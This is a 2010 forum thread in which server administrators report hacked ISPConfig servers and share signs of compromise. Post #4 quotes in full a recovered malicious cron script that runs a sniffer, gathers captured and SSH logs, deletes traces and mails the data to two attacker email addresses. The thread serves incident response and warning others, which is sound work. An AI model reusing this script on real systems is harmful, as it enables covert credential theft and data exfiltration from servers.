#1  
Old 1st March 2010, 22:44
SamTzu SamTzu is offline
HowtoForge Supporter
 
Join Date: Apr 2007
Location: Helsinki
Posts: 426
Thanks: 33
Thanked 55 Times in 38 Posts
Send a message via Skype™ to SamTzu
Exclamation Hacked!!!

Posting this quickly so that others can check their systems for signs.
ls -ahl /usr/lib/.x/

If that shows you files on your server you have been hacked just like we seem to have been on serveral servers. (All ISPConfig3 servers.)

Powered by ISPConfig 3.0.1.6

Debian Lenny 5.0.3 (OpenVz) Proxmox 1.4
Linux server44 2.6.24-7-pve #1 SMP PREEMPT Tue Jun 2 08:00:29 CEST 2009 i686


Seems like some kind of IRC Bot.
__________________

Sami Mattila
Internet-Content

Telephone:
00358942833310
Email: firstname.lastname@internet-content.org
Shop: http://shop.internet-content.net
Site: http://www.internet-content.net
Blog: http://www.internet-content.net/en/blog
FB: https://www.facebook.com/internetcontent

Reply With Quote
Sponsored Links
  #2  
Old 1st March 2010, 22:58
edge edge is offline
Moderator
 
Join Date: Dec 2005
Location: The Netherlands
Posts: 2,033
Thanks: 261
Thanked 150 Times in 130 Posts
Default

All my Debian Lenny servers (with ISPconfig3) are okay.
Quote:
ls -ahl /usr/lib/.x/
ls: cannot access /usr/lib/.x/: No such file or directory
__________________
Never execute code written on a Friday or a Monday.

Last edited by edge; 1st March 2010 at 23:01.
Reply With Quote
  #3  
Old 1st March 2010, 23:00
SamTzu SamTzu is offline
HowtoForge Supporter
 
Join Date: Apr 2007
Location: Helsinki
Posts: 426
Thanks: 33
Thanked 55 Times in 38 Posts
Send a message via Skype™ to SamTzu
Default

(Uups spoke too soon!! Looks like Ubuntu 8.04 LTS / ISPConfig 2's are also vulnerable.)
Also found them in Debian 5.0.3 / ISPConfig 3's so far.

If your server has been used to hack other servers you can see something like this in 'name'.seen file.

server.name.com none 1267130228 2 Quit: I'll get you for this!!!
m1n2b3b3b m1n2b3b3b!~l3iliboi@161.253.129.67 none 1267471837 3 l3iliboi--
l3iliboi`- l3iliboi`-!~l3iliboi@l3iliboi.users.undernet.org none 1267392327 3 l3iliboi
l3iliboi l3iliboi!~l3iliboi@l3iliboi.users.undernet.org none 1267426060 2 Read error: Operation timed out

Also crontab -e will show your crontab emty execpt a command that will call /usr/lib/.x/update file.
__________________

Sami Mattila
Internet-Content

Telephone:
00358942833310
Email: firstname.lastname@internet-content.org
Shop: http://shop.internet-content.net
Site: http://www.internet-content.net
Blog: http://www.internet-content.net/en/blog
FB: https://www.facebook.com/internetcontent


Last edited by SamTzu; 1st March 2010 at 23:32.
Reply With Quote
  #4  
Old 2nd March 2010, 00:06
SamTzu SamTzu is offline
HowtoForge Supporter
 
Join Date: Apr 2007
Location: Helsinki
Posts: 426
Thanks: 33
Thanked 55 Times in 38 Posts
Send a message via Skype™ to SamTzu
Default

The plot thickens.
This was recovered on one of our tests servers that has ISPconfig2 on Ubuntu 8.04 LTS.

They used /etc/cron.daily/dnsquery:

#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log >> test
echo "$(uptime)" >> test
rm -rf httpd.log
echo "named.sn"
cat /usr/lib/named/named.sn >> test
rm -rf /usr/lib/named/named.sn
cd /usr/lib/named
./clean
./cleanssh
echo "ssh.log" >> /usr/lib/test
cat ssh.log >> /usr/lib/test
cd /usr/lib/
mail thelinuxpinguin@yahoo.com -s "$(hostname -f)" < test
mail stormuletzz@yahoo.ca -s "$(hostname -f)" < test
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A
__________________

Sami Mattila
Internet-Content

Telephone:
00358942833310
Email: firstname.lastname@internet-content.org
Shop: http://shop.internet-content.net
Site: http://www.internet-content.net
Blog: http://www.internet-content.net/en/blog
FB: https://www.facebook.com/internetcontent


Last edited by SamTzu; 2nd March 2010 at 00:13.
Reply With Quote
  #5  
Old 2nd March 2010, 00:35
edge edge is offline
Moderator
 
Join Date: Dec 2005
Location: The Netherlands
Posts: 2,033
Thanks: 261
Thanked 150 Times in 130 Posts
Default

So.. Any fix for this?
__________________
Never execute code written on a Friday or a Monday.
Reply With Quote
  #6  
Old 2nd March 2010, 00:48
edge edge is offline
Moderator
 
Join Date: Dec 2005
Location: The Netherlands
Posts: 2,033
Thanks: 261
Thanked 150 Times in 130 Posts
Default

Looks like an old hack from 2006
See: http://ubuntuforums.org/showthread.php?t=221922
Page 2 will show the exact same code as you posted.
__________________
Never execute code written on a Friday or a Monday.
Reply With Quote
Reply

Bookmarks

Tags
debian, hacked, irc, ispconfig3, lenny

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
hELP WITH HACKED WEBSITE PLS spytron Server Operation 1 12th October 2009 16:29
My ISPConfig got hacked nsansari General 1 7th September 2009 13:01
Urgent need help my server is hacked !!!! zinovsky Server Operation 3 5th February 2009 17:23
Have I Been Hacked? :-o PierreQuebec Server Operation 11 8th April 2008 09:24
hacked by By BeLa & BodyguarD shajazzi HOWTO-Related Questions 2 25th April 2007 23:49


All times are GMT +2. The time now is 09:32.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.